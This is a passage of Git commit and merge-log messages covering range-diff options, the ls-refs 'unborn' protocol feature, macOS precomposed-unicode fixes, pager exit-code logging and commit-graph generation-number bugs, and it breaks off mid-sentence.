Reported-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our setting of GitHub CI test jobs was a bit too eager to give up
once there is even one failure found. Tweak the knob to allow
other jobs to keep running even when we see a failure, so that we can
find more failures in a single run.
* pb/ci-matrix-wo-shortcut:
ci: do not cancel all jobs of a matrix if one fails
The implementation of "git branch --sort" wrt the detached HEAD
display has always been hacky, which has been cleaned up.
* ab/branch-sort:
branch: show "HEAD detached" first under reverse sort
branch: sort detached HEAD based on a flag
ref-filter: move ref_sorting flags to a bitfield
ref-filter: move "cmp_fn" assignment into "else if" arm
ref-filter: add braces to if/else if/else chain
branch tests: add to --sort tests
branch: change "--local" to "--list" in comment
Code clean-up.
* ma/t1300-cleanup:
t1300: don't needlessly work with `core.foo` configs
t1300: remove duplicate test for `--file no-such-file`
t1300: remove duplicate test for `--file ../foo`
A 3-year old test that was not testing anything useful has been
corrected.
* fc/t6030-bisect-reset-removes-auxiliary-files:
test: bisect-porcelain: fix location of files
There are three forms, depending on whether the user specifies one, two or
three non-option arguments. We've never actually explained how this
works in the manual, so let's explain it.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the `SPECIFYING RANGES` section of gitrevisions(7), two ways are
described to specify commit ranges that `range-diff` does not yet
accept: "<commit>^!" and "<commit>^-<n>".
Let's accept them, by parsing them via the revision machinery and
looking for at least one interesting and one uninteresting revision in
the resulting `pending` array.
This also finally lets us reject arguments that _do_ contain `..` but
are not actually ranges, e.g. `HEAD^{/do.. match this}`.
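The check described above can be pictured with a small sketch. This is not the code in range-diff.c: the `Pending` class and the `is_range()` helper are hypothetical stand-ins for entries of the `pending` array and their "uninteresting" flag.

```python
from dataclasses import dataclass


@dataclass
class Pending:
    name: str
    uninteresting: bool  # hypothetical stand-in for the UNINTERESTING flag


def is_range(pending):
    """Return True if the parsed argument produced both kinds of revisions."""
    has_negative = any(p.uninteresting for p in pending)
    has_positive = any(not p.uninteresting for p in pending)
    return has_negative and has_positive
```

Under this model, an argument such as `A^!` would yield `A` as interesting and its parents as uninteresting, so it would be accepted, while a lone `HEAD` would not.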
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When comparing commit ranges, one is frequently interested only in one
side, such as asking the question "Has this patch that I submitted to
the Git mailing list been applied?": one would only care about the part
of the output that corresponds to the commits in a local branch.
To make that possible, imitate the `git rev-list` options `--left-only`
and `--right-only`.
This addresses https://github.com/gitgitgadget/git/issues/206
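As a rough illustration of the filtering these options perform, assume each line of range-diff output is modelled as a `(left, right)` pair in which a missing side is `None`. The `filter_pairs()` helper below is hypothetical and only sketches the idea of suppressing commits that are missing from one side.

```python
def filter_pairs(pairs, left_only=False, right_only=False):
    """Keep only pairs that have a commit on the requested side."""
    kept = []
    for left, right in pairs:
        if left_only and left is None:
            continue  # commit exists only in the right range
        if right_only and right is None:
            continue  # commit exists only in the left range
        kept.append((left, right))
    return kept
```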
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It is actually only the `output()` function that uses those diffopts. By
moving the diffopt initialization down into that function, it is
encapsulated better.
Incidentally, it will also make it easier to implement the `--left-only`
and `--right-only` options in `git range-diff` because the `output()`
function is now receiving all range-diff options as a parameter, not
just the diffopts.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This will make it easier to implement the `--left-only` and
`--right-only` options.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We've carried compatibility codepaths for compilers without
variadic macros for quite some time, but the world may be ready for
them to be removed. Force compilation failure on exotic platforms
where variadic macros are not available to find out who screams in
such a way that we can easily revert if it turns out that the world
is not yet ready.
* jk/weather-balloon-require-variadic-macro:
git-compat-util: always enable variadic macros
The "pack-objects" command needs to iterate over all the tags when
automatic tag following is enabled, but it actually iterated over
all refs and then discarded everything outside "refs/tags/"
hierarchy, which was quite wasteful.
* jv/pack-objects-narrower-ref-iteration:
builtin/pack-objects.c: avoid iterating all refs
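The saving can be sketched as follows, assuming the ref names are available as a sorted list. The `refs_with_prefix()` helper is hypothetical; it only shows why starting the walk at "refs/tags/" avoids touching unrelated refs.

```python
from bisect import bisect_left


def refs_with_prefix(sorted_refs, prefix):
    """Visit only the refs under `prefix` in a sorted list of ref names."""
    start = bisect_left(sorted_refs, prefix)  # jump straight to the hierarchy
    matches = []
    for name in sorted_refs[start:]:
        if not name.startswith(prefix):
            break  # left the hierarchy, nothing further can match
        matches.append(name)
    return matches
```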
When removing many branches and tags, the code used to do so one
ref at a time. There is another API it can use to delete multiple
refs, and it makes quite a lot of performance difference when the
refs are packed.
* ph/use-delete-refs:
use delete_refs when deleting tags or branches
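A toy cost model makes the difference visible. It assumes, purely for illustration, that every call touching packed refs rewrites the packed storage once; the `PackedRefs` class and its counters are hypothetical and do not mirror Git's refs API.

```python
class PackedRefs:
    """Toy model: each call that changes packed refs costs one rewrite."""

    def __init__(self, refs):
        self.refs = set(refs)
        self.rewrites = 0

    def delete_ref(self, name):
        self.refs.discard(name)
        self.rewrites += 1  # one rewrite per deleted ref

    def delete_refs(self, names):
        self.refs -= set(names)
        self.rewrites += 1  # one rewrite for the whole batch
```

Deleting N refs one at a time costs N rewrites in this model, while the batched call costs one.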
The ls-refs protocol operation has been optimized to narrow the
sub-hierarchy of refs/ it walks to produce its response.
* tb/ls-refs-optim:
ls-refs.c: traverse prefixes of disjoint "ref-prefix" sets
ls-refs.c: initialize 'prefixes' before using it
refs: expose 'for_each_fullref_in_prefixes'
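One way to picture the "disjoint prefixes" idea is to drop every requested prefix that is already covered by a shorter one, so that no part of the ref hierarchy is walked twice. The `disjoint_prefixes()` helper is a hypothetical sketch, not the function in ls-refs.c.

```python
def disjoint_prefixes(prefixes):
    """Reduce a list of ref prefixes to ones that do not contain each other."""
    kept = []
    for prefix in sorted(set(prefixes)):
        # In sorted order, anything covered by a kept prefix follows it directly.
        if kept and prefix.startswith(kept[-1]):
            continue
        kept.append(prefix)
    return kept
```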
"git ls-files" can and does show multiple entries when the index is
unmerged, which is a source of confusion unless the -s/-u option is in
use. A new option --deduplicate has been introduced.
* zh/ls-files-deduplicate:
ls-files.c: add --deduplicate option
ls_files.c: consolidate two for loops into one
ls_files.c: bugfix for --deleted and --modified
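The effect of the new option can be sketched by modelling index entries as `(path, stage)` tuples sorted by path, where an unmerged path appears once per stage. The `list_paths()` helper is hypothetical.

```python
def list_paths(entries, deduplicate=False):
    """Print-order list of paths; optionally collapse repeated paths."""
    shown = []
    for path, _stage in entries:
        if deduplicate and shown and shown[-1] == path:
            continue  # same path already shown for an earlier stage
        shown.append(path)
    return shown
```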
Document, clean-up and optimize the code around the cache-tree
extension in the index.
* ds/cache-tree-basics:
cache-tree: speed up consecutive path comparisons
cache-tree: use ce_namelen() instead of strlen()
index-format: discuss recursion of cache-tree better
index-format: update preamble to cache tree extension
index-format: use 'cache tree' over 'cached tree'
cache-tree: trace regions for prime_cache_tree
cache-tree: trace regions for I/O
cache-tree: use trace2 in cache_tree_update()
unpack-trees: add trace2 regions
tree-walk: report recursion counts
ORT merge strategy learns more support for merge conflicts.
* en/ort-conflict-handling:
merge-ort: add handling for different types of files at same path
merge-ort: copy find_first_merges() implementation from merge-recursive.c
merge-ort: implement format_commit()
merge-ort: copy and adapt merge_submodule() from merge-recursive.c
merge-ort: copy and adapt merge_3way() from merge-recursive.c
merge-ort: flesh out implementation of handle_content_merge()
merge-ort: handle book-keeping around two- and three-way content merge
merge-ort: implement unique_path() helper
merge-ort: handle directory/file conflicts that remain
merge-ort: handle D/F conflict where directory disappears due to merge
"git log" learned a new "--diff-merges=<how>" option.
* so/log-diff-merge: (32 commits)
t4013: add tests for --diff-merges=first-parent
doc/git-show: include --diff-merges description
doc/rev-list-options: document --first-parent changes merges format
doc/diff-generate-patch: mention new --diff-merges option
doc/git-log: describe new --diff-merges options
diff-merges: add '--diff-merges=1' as synonym for 'first-parent'
diff-merges: add old mnemonic counterparts to --diff-merges
diff-merges: let new options enable diff without -p
diff-merges: do not imply -p for new options
diff-merges: implement new values for --diff-merges
diff-merges: make -m/-c/--cc explicitly mutually exclusive
diff-merges: refactor opt settings into separate functions
diff-merges: get rid of now empty diff_merges_init_revs()
diff-merges: group diff-merge flags next to each other inside 'rev_info'
diff-merges: split 'ignore_merges' field
diff-merges: fix -m to properly override -c/--cc
t4013: add tests for -m failing to override -c/--cc
t4013: support test_expect_failure through ':failure' magic
diff-merges: revise revs->diff flag handling
diff-merges: handle imply -p on -c/--cc logic for log.c
...
When more than one commit with the same patch ID appears on one
side, "git log --cherry-pick A...B" did not exclude them all when a
commit with the same patch ID appears on the other side. Now it
does.
* jk/log-cherry-pick-duplicate-patches:
patch-ids: handle duplicate hashmap entries
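A minimal sketch of the intended behavior, assuming commits are given as `(commit, patch_id)` tuples: every left-side commit that shares a patch ID with a right-side commit is excluded, not just the first one found. The `cherry_pick_filter()` helper is hypothetical and is not the patch-ids.c implementation.

```python
from collections import defaultdict


def cherry_pick_filter(left, right):
    """Drop commits whose patch ID also appears on the other side."""
    by_id = defaultdict(list)
    for commit, patch_id in left:
        by_id[patch_id].append(commit)  # keep every duplicate, not just one

    dropped = set()
    keep_right = []
    for commit, patch_id in right:
        if patch_id in by_id:
            dropped.update(by_id[patch_id])  # exclude all left-side duplicates
        else:
            keep_right.append(commit)

    keep_left = [commit for commit, _ in left if commit not in dropped]
    return keep_left, keep_right
```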
Newline characters in the host and path part of git:// URL are
now forbidden.
* jk/forbid-lf-in-git-url:
fsck: reject .gitmodules git:// urls with newlines
git_connect_git(): forbid newlines in host and path
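The rule amounts to a simple validation step before the request is sent. The sketch below uses a hypothetical `check_git_url_parts()` helper and an invented error message; it only illustrates the check, not Git's actual code or wording.

```python
def check_git_url_parts(host, path):
    """Reject a git:// host or path that contains a newline."""
    for label, value in (("host", host), ("path", path)):
        if "\n" in value:
            raise ValueError(f"newline is forbidden in git:// {label}: {value!r}")
```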
Comments update.
* ab/gettext-charset-comment-fix:
gettext.c: remove/reword a mostly-useless comment
Makefile: remove a warning about old GETTEXT_POISON flag
Fix 2.29 regression where "git mergetool --tool-help" fails to list
all the available tools.
* pb/mergetool-tool-help-fix:
mergetool--lib: fix '--tool-help' to correctly show available tools
"git for-each-repo --config=<var> <cmd>" should not run <cmd> for
any repository when the configuration variable <var> is not defined
even once.
* ds/for-each-repo-noopfix:
for-each-repo: do nothing on empty config
Some tests expect that "ls -l" output has either '-' or 'x' for
group executable bit, but setgid bit can be inherited from parent
directory and make these fields 'S' or 's' instead, causing test
failures.
* mt/t4129-with-setgid-dir:
t4129: don't fail if setgid is set in the test directory
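The way the setgid bit changes the group-execute column can be reproduced with Python's `stat.filemode()`, which renders a mode the way "ls -l" does. The variable names are only for illustration.

```python
import stat

# Directory with mode 755: the group execute column shows "x".
plain = stat.filemode(stat.S_IFDIR | 0o755)

# Same directory with setgid: the column becomes "s".
setgid = stat.filemode(stat.S_IFDIR | stat.S_ISGID | 0o755)

# Setgid without group execute permission: the column becomes "S".
setgid_noexec = stat.filemode(stat.S_IFDIR | stat.S_ISGID | 0o745)
```

A test that expects only '-' or 'x' in that column would therefore fail in a directory that inherits setgid.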
"git stash" did not work well in a sparsely checked out working
tree.
* en/stash-apply-sparse-checkout:
stash: fix stash application in sparse-checkouts
stash: remove unnecessary process forking
t7012: add a testcase demonstrating stash apply bugs in sparse checkouts
In preparation for creating an API around file formats using chunks and
tables of contents, prepare the commit-graph write code to use
prototypes that will match this new API.
Specifically, convert chunk_write_fn to take a "void *data" parameter
instead of the commit-graph-specific "struct write_commit_graph_context"
pointer.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Teach Git to use the "unborn" feature introduced in a previous patch as
follows: Git will always send the "unborn" argument if it is supported
by the server. During "git clone", if cloning an empty repository, Git
will use the new information to determine the local branch to create. In
all other cases, Git will ignore it.
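The resulting choice of local branch during "git clone" can be sketched as a simple fallback chain. The `branch_to_create()` helper and its parameter names are hypothetical; branch names are shortened for readability.

```python
def branch_to_create(remote_head, unborn_head, init_default_branch):
    """Pick the local branch name for a fresh clone."""
    if remote_head is not None:
        return remote_head  # the remote HEAD points at an existing branch
    if unborn_head is not None:
        return unborn_head  # empty repository, but the server named its target
    return init_default_branch  # no information from the server at all
```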
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a future patch we plan to return the name of an unborn current branch
from deep in the callchain to a caller via a new pointer parameter that
points at a variable in the caller when the caller calls
get_remote_refs() and transport_get_remote_refs().
In preparation for that, encapsulate the existing ref_prefixes
parameter into a struct. The aforementioned unborn current branch will
go into this new struct in the future patch.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When cloning, we choose the default branch based on the remote HEAD.
But if there is no remote HEAD reported (which could happen if the
target of the remote HEAD is unborn), we'll fall back to using our local
init.defaultBranch. Traditionally this hasn't been a big deal, because
most repos used "master" as the default. But these days it is likely to
cause confusion if the server and client implementations choose
different values (e.g., if the remote started with "main", we may choose
"master" locally, create commits there, and then the user is surprised
when they push to "master" and not "main").
To solve this, the remote needs to communicate the target of the HEAD
symref, even if it is unborn, and "git clone" needs to use this
information.
Currently, symrefs that have unborn targets (such as in this case) are
not communicated by the protocol. Teach Git to advertise and support the
"unborn" feature in "ls-refs" (by default, this is advertised, but
server administrators may turn this off through the lsrefs.unborn
config). This feature indicates that "ls-refs" supports the "unborn"
argument; when it is specified, "ls-refs" will send the HEAD symref with
the name of its unborn target.
This change is only for protocol v2. A similar change for protocol v0
would require independent protocol design (there being no analogous
position to signal support for "unborn") and client-side plumbing of the
data required, so the scope of this patch set is limited to protocol v2.
The client side will be updated to use this in a subsequent commit.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Move rationale for new hash function to beginning of document
so that it appears before the concrete move to SHA-256 is described.
Remove some of the details about SHA-1 weaknesses and add references
to the details on how the new hash function was chosen instead.
Signed-off-by: Thomas Ackermann <th.acker@arcor.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Use SHA-1 and SHA-256 instead of sha1 and sha256 when referring
to the hash type.
Signed-off-by: Thomas Ackermann <th.acker@arcor.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Asciidoc requires lists to start with an empty line and uses
different characters for indentation levels ("-", "*", "**", ...).
For special symbols such as a dash, "--" has to be used, and there is
no double arrow "<->", so a left and a right arrow "<-->" have to be
combined for that. Lastly, for verbatim output, a newline followed
by an indentation has to be used.
Fix asciidoc output for lists, special characters and verbatim
text while retaining the readability of the original text file.
Signed-off-by: Thomas Ackermann <th.acker@arcor.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Previously, we waited for the child process to be finished in every
failing code path as well as at the end of the function
`show_range_diff()`.
However, we do not need to wait that long. Directly after reading the
output of the child process, we can wrap up the child process.
This also has the advantage that we don't do a bunch of unnecessary work
in case `finish_command()` returns with an error anyway.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In library functions, we do want to avoid the (simple, but rather final)
`die()` calls, instead returning with a value indicating an error.
Let's do exactly that in the code introduced in b66885a30c
(range-diff: add section header instead of diff header, 2019-07-11) that
wants to error out if a diff header could not be parsed.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the code paths in question, we already release a lot of memory, but
the `current_filename` variable was missed. Fix that.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The .use_shell flag in struct child_process that is passed to
run_command() API has been clarified with a bit more documentation.
* jk/run-command-use-shell-doc:
run-command: document use_shell option
Test clean-up plus UI improvement by hiding extra refs that
the prefetch task uses from "log --decorate" output.
* ds/maintenance-prefetch-cleanup:
t7900: clean up some broken refs
maintenance: set log.excludeDecoration during prefetch
Reimplement the `bisect_skip()` shell function in C and also add
`--bisect-skip` subcommand to `git bisect--helper` to call it from
git-bisect.sh.
Using `--bisect-skip` subcommand is a temporary measure to port shell
function to C so as to use the existing test suite.
Mentored-by: Lars Schneider <larsxschneider@gmail.com>
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Signed-off-by: Pranit Bauva <pranit.bauva@gmail.com>
Signed-off-by: Tanushree Tumane <tanushreetumane@gmail.com>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Use `res` variable to store `bisect_reset()` output in BISECT_RESET
case option to make bisect--helper.c more consistent.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Reimplement the `bisect_replay` shell function in C and also add
`--bisect-replay` subcommand to `git bisect--helper` to call it from
git-bisect.sh.
Using `--bisect-replay` subcommand is a temporary measure to port shell
function to C so as to use the existing test suite.
Mentored-by: Lars Schneider <larsxschneider@gmail.com>
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Signed-off-by: Pranit Bauva <pranit.bauva@gmail.com>
Signed-off-by: Tanushree Tumane <tanushreetumane@gmail.com>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The description for "-c" is hard to parse. I think the big issue is lack
of commas, but I've also reordered the words to keep the main focus
point of "instead of renaming, copy" together.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We didn't special-case "branch -M" (with a capital M) the same as
"branch -m", nor any of the "--copy" variants. As a result these offered
any ref as the next candidate, and not just branch names.
Note that I rewrapped case-arm line since it's now quite long, and
likewise the one below it for consistency. I also re-ordered the
existing "-D" to make it more obvious how the cases group together.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The following sequence leads to a "BUG" assertion when run under macOS:
DIR=git-test-restore-p
Adiarnfd=$(printf 'A\314\210')
DIRNAME=xx${Adiarnfd}yy
mkdir $DIR &&
cd $DIR &&
git init &&
mkdir $DIRNAME &&
cd $DIRNAME &&
echo "Initial" >file &&
git add file &&
echo "One more line" >>file &&
echo y | git restore -p .
Initialized empty Git repository in /tmp/git-test-restore-p/.git/
BUG: pathspec.c:495: error initializing pathspec_item
Cannot close git diff-index --cached --numstat
[snip]
The command `git restore` is run from a directory inside a Git repo.
Git needs to split the $CWD into 2 parts:
The path to the repo and "the rest", if any.
"The rest" becomes a "prefix" later used inside the pathspec code.
As an example, "/path/to/repo/dir-inside-repå" would determine
"/path/to/repo" as the root of the repo, the place where the
configuration file .git/config is found.
The rest becomes the prefix ("dir-inside-repå"), from where the
pathspec machinery expands the ".", more about this later.
If the name is in decomposed form (making the decomposition visible like this),
"dir-inside-rep°a" doesn't match "dir-inside-repå".
Git commands need to:
(a) read the configuration variable "core.precomposeunicode"
(b) precompose argv[]
(c) precompose the prefix, if there was any
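The mismatch between decomposed and precomposed names can be demonstrated with Unicode normalization. This sketch uses NFC from Python's `unicodedata` module as an approximation of what precomposing does; Git's own conversion is a different mechanism, and the `precompose()` helper here is hypothetical.

```python
import unicodedata


def precompose(name):
    """Approximate precomposition with Unicode NFC normalization."""
    return unicodedata.normalize("NFC", name)


# The directory name from the reproduction: "A" followed by the
# combining diaeresis (UTF-8 bytes 0xCC 0x88), surrounded by "xx" and "yy".
decomposed = b"xxA\xcc\x88yy".decode("utf-8")
precomposed = precompose(decomposed)
```

The two strings look identical on screen but compare unequal, which is why both argv[] and the prefix have to go through the same conversion. Applying `precompose()` to an already precomposed string returns it unchanged.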
The first commit,
76759c7dff "git on Mac OS and precomposed unicode"
addressed (a) and (b).
The call to precompose_argv() was added into parse-options.c,
because that seemed to be a good place when the patch was written.
Commands that don't use parse-options need to do (a) and (b) themselves.
The commands `diff-files`, `diff-index`, `diff-tree` and `diff`
learned (a) and (b) in
commit 90a78b83e0 "diff: run arguments through precompose_argv"
Branch names (or refs in general) using decomposed code points
resulting in decomposed file names had been fixed in
commit 8e712ef6fc "Honor core.precomposeUnicode in more places"
The bug report from above shows 2 things:
- more commands need to handle precomposed unicode
- (c) should be implemented for all commands using pathspecs
Solution:
precompose_argv() now handles the prefix (if needed), and is renamed into
precompose_argv_prefix().
Inside this function the config variable core.precomposeunicode is read
into the global variable precomposed_unicode, as before.
This reading is skipped if precomposed_unicode had been read before.
The original patch for precomposed unicode, 76759c7dff, placed
precompose_argv() into parse-options.c
Now add it into git.c::run_builtin() as well. Existing precompose
calls in diff-files.c and others may become redundant, and if we
audit the callflows that reach these places to make sure that they
can never be reached without going through the new call added to
run_builtin(), we might be able to remove these existing ones.
But in this commit, we do not bother to do so and leave these
precompose callsites as they are. Because precompose() is
idempotent and can be called on an already precomposed string
safely, this is safer than removing existing calls without fully
vetting the callflows.
There is certainly room for cleanups - this change intends to be a bug fix.
Cleanups need more tests in e.g. t/t3910-mac-os-precompose.sh, and should
be done in future commits.
[1] git-bugreport-2021-01-06-1209.txt (git can't deal with special characters)
[2] https://lore.kernel.org/git/A102844A-9501-4A86-854D-E3B387D378AA@icloud.com/
Reported-by: Daniel Troger <random_n0body@icloud.com>
Helped-By: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Torsten Bögershausen <tboegi@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The former offers not just branches but tags as completion
candidates.
Mimic how "branch -d" limits its suggestion to branch names.
Reported-by: Paul Jolly <paul@myitcv.io>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Apply a few leftover improvements from the review of ad5df6b782
(upload-pack.c: fix filter spec quoting bug).
1. Instead of enumerating objects reachable from HEAD, enumerate all
reachable objects, because HEAD has no special significance in this
test.
2. Instead of relying on the knowledge that "?" in rev-list output
means partial clone", explicitly verify that there are no blobs with
cat-file.
Signed-off-by: Jacob Vosmaer <jacob@gitlab.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When git invokes a pager that exits with non-zero, the common case is
that we'll already return the correct SIGPIPE failure from git itself,
but the exit code logged in trace2 has always been incorrectly
reported[1]. Fix that and log the correct exit code in the logs.
Since this gives us something to test outside of our recently-added
tests needing a !MINGW prerequisite, let's refactor the test to run on
MINGW and actually check for SIGPIPE outside of MINGW.
The wait_or_whine() is only called with a true "in_signal" from
finish_command_in_signal(), which in turn is only used in pager.c.
The "in_signal && !WIFEXITED(status)" case is not covered by
tests. Let's log the default -1 in that case for good measure.
1. The incorrect logging of the exit code was seemingly copy/pasted
into finish_command_in_signal() in ee4512ed48 (trace2: create new
combined trace facility, 2019-02-22)
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add braces to an "if" block in the wait_or_whine() function. This
isn't needed now, but will make a subsequent commit easier to read.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add tests for how git behaves when the pager itself exits with
non-zero, as well as for us exiting with 141 when we're killed with
SIGPIPE due to the pager not consuming its output.
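The value 141 follows the usual shell convention of reporting death by signal as 128 plus the signal number, and SIGPIPE is 13 on Linux and most POSIX systems. The sketch below assumes a POSIX platform and uses the Python `subprocess` convention of a negative return code for a signalled child; `shell_style_exit_code()` is a hypothetical helper.

```python
import signal


def shell_style_exit_code(returncode):
    """Map a subprocess-style return code to the shell convention.

    A negative value -N means "killed by signal N" and maps to 128 + N.
    """
    if returncode < 0:
        return 128 - returncode
    return returncode


sigpipe_exit = shell_style_exit_code(-int(signal.SIGPIPE))
```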
There is some recent discussion[1] about these semantics, but aside
from what we want to do in the future, we should have a test for the
current behavior.
This test construct is stolen from 7559a1be8a (unblock and unignore
SIGPIPE, 2014-09-18). The reason not to make the test itself depend on
the MINGW prerequisite is to make a subsequent commit easier to read.
1. https://lore.kernel.org/git/87o8h4omqa.fsf@evledraar.gmail.com/
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Refactor the wait_for_pager() function. Since 507d7804c0 (pager:
don't use unsafe functions in signal handlers, 2015-09-04) the
wait_for_pager() and wait_for_pager_atexit() callers diverged on more
than they shared.
Let's extract the common code into a new close_pager_fds() helper, and
move the parts unique to the only two callers to those functions.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Before checking if the repository has a commit-graph loaded, be sure
to run prepare_commit_graph(). This is necessary because otherwise
the topo_levels slab is not initialized. As we compute topo_levels for
the new commits, we iterate further into the lower layers since the
first visit to each commit looks as though the topo_level is not
populated.
By properly initializing the topo_slab, we fix the previously broken
case of a split commit graph where a base layer has the
generation_data_overflow chunk.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When upgrading to a commit-graph with corrected commit dates from
one without, there are a few things that need to be considered.
When computing generation numbers for the new commit-graph file that
expects to add the generation_data chunk with corrected commit
dates, we need to ensure that the 'generation' member of the
commit_graph_data struct is set to zero for these commits.
Unfortunately, the fallback to use topological level for generation
number when corrected commit dates are not available is causing us
harm here: parsing commits notices that read_generation_data is
false and populates 'generation' with the topological level.
The solution is to iterate through the commits, parse the commits
to populate initial values, then reset the generation values to
zero to trigger recalculation. This loop only occurs when the
existing commit-graph data has no corrected commit dates.
While this improves our situation somewhat, we have not completely
solved the issue for correctly computing generation numbers for mixed
layers. That follows in the next change.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The compute_generation_numbers() method was introduced by 3258c663
(commit-graph: compute generation numbers, 2018-05-01) to compute what
is now known as "topological levels". These are still stored in the
commit-graph file for compatibility's sake while c1a09119 (commit-graph:
implement corrected commit date, 2021-01-16) updated the method to also
compute the new version of generation numbers: corrected commit date.
It makes sense why these are grouped. They perform very similar walks of
the necessary commits and compute similar maximums over each parent.
However, having these two together conflates them in subtle ways that are
hard to separate.
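To see why the two computations share a walk, here is a minimal sketch that computes both values in one pass. It assumes the usual definitions: a topological level is one more than the largest level among the parents (1 for a root), and a corrected commit date is the larger of the commit's own date and one more than the largest corrected date among its parents. The `compute_generations()` function and its input format are hypothetical, not the code in commit-graph.c.

```python
def compute_generations(commits):
    """commits maps name -> (commit_date, [parent names]).

    Returns two dicts: topological levels and corrected commit dates.
    """
    topo, corrected = {}, {}
    for start in commits:
        stack = [start]
        while stack:
            name = stack[-1]
            if name in topo:
                stack.pop()  # already computed via another path
                continue
            date, parents = commits[name]
            pending = [p for p in parents if p not in topo]
            if pending:
                stack.extend(pending)  # compute the parents first
                continue
            topo[name] = 1 + max((topo[p] for p in parents), default=0)
            corrected[name] = max([date] + [corrected[p] + 1 for p in parents])
            stack.pop()
    return topo, corrected
```

Both values are a maximum over the parents, which is why it is tempting to store them through the same code path even though they mean different things.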
In particular, the topo_level slab is used to store the topological
levels in all cases, but the commit_graph_data_at(c)->generation member
stores different values depending on the state of the existing
commit-graph file.
* If the existing commit-graph file has a "GDAT" chunk, then these
values represent corrected commit dates.
* If the existing commit-graph file doesn't have a "GDAT" chunk, then
these values are actually the topological levels.
This issue occurs only when upgrading an existing commit-graph file
into one that has the "GDAT" chunk. The current change does not resolve
this upgrade problem, but splitting the implementation into two pieces
here helps with that process, which will follow in the next change.
The important thing this helps with is the case where the
num_generation_data_overflows was being incremented incorrectly,
triggering a write of the overflow chunk.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We need to be extra careful that we don't use corrected
commit dates from any layer of a commit-graph chain if there is a
single commit-graph file that is missing the generation_data chunk.
Update validate_mixed_generation_chain() to correctly update each
layer to ignore the generation_data chunk in this case. It now also
returns 1 if all layers have a generation_data chunk. This return
value will be used in the next change.
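The rule can be sketched as "all or nothing" across the chain. In the sketch below each layer is a plain dictionary, and the key names `has_gdat` and `read_generation_data` as well as the function name are assumptions made for illustration; this is not the implementation of validate_mixed_generation_chain().

```python
def validate_chain_sketch(layers):
    """Use corrected commit dates only if every layer has the chunk.

    Returns 1 if all layers have a generation_data chunk, else 0.
    """
    all_have = all(layer["has_gdat"] for layer in layers)
    for layer in layers:
        # A single layer without the chunk disables it for the whole chain.
        layer["read_generation_data"] = all_have
    return 1 if all_have else 0
```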
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There is a subtle failure happening when computing corrected commit
dates with --split enabled. It requires a base layer needing the
generation_data_overflow chunk. Then, the next layer on top
erroneously thinks it needs an overflow chunk due to a bug leading
to recalculating all reachable generation numbers. The output of
the failure is
BUG: commit-graph.c:1912: expected to write 8 bytes to
chunk 47444f56, but wrote 0 instead
These "expected" 8 bytes are due to re-computing the corrected
